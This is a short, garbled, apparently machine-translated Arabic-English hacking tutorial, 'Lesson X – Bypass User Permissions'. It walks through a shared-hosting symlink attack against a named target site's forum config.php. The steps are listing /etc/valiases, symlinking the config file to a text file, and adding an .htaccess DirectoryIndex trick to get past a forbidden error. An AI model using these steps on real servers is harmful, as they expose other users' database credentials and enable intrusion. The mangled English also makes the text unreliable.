الدرس العاشر - تخطي صلاحية اليوزر 11 | The Lesson X - Bypass User Permissions 11

مركز الحاسوب الدولي – International Computer Center
الدرس العاشر – تخطي صلاحية اليوزر | Security & hack Tutorial The Lesson X – Bypass User Permissions
لتحميل الادوات على اكثر من سيرفر …. الباسورد الضغط = cih team
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The target site

Track real Konfq Forum
/ home / shadiast / public_html / fans / includes / config.php

To extract the name of the site on the server, there are several ways, including
ls-la / etc / valiases / shadiastar.net

Al-Qaeda claimed the pull Bammer function Asamlink
ln-s / home / shadiast / public_html / fans / includes / config.php t.txt

Forbidden problem
1 – Work Faulder
2 – Work file named
. htaccess
File Alhateix
DirectoryIndex cih.cih
3 – ln-s / home / shadiast / public_html / fans / includes / config.php cih.cih

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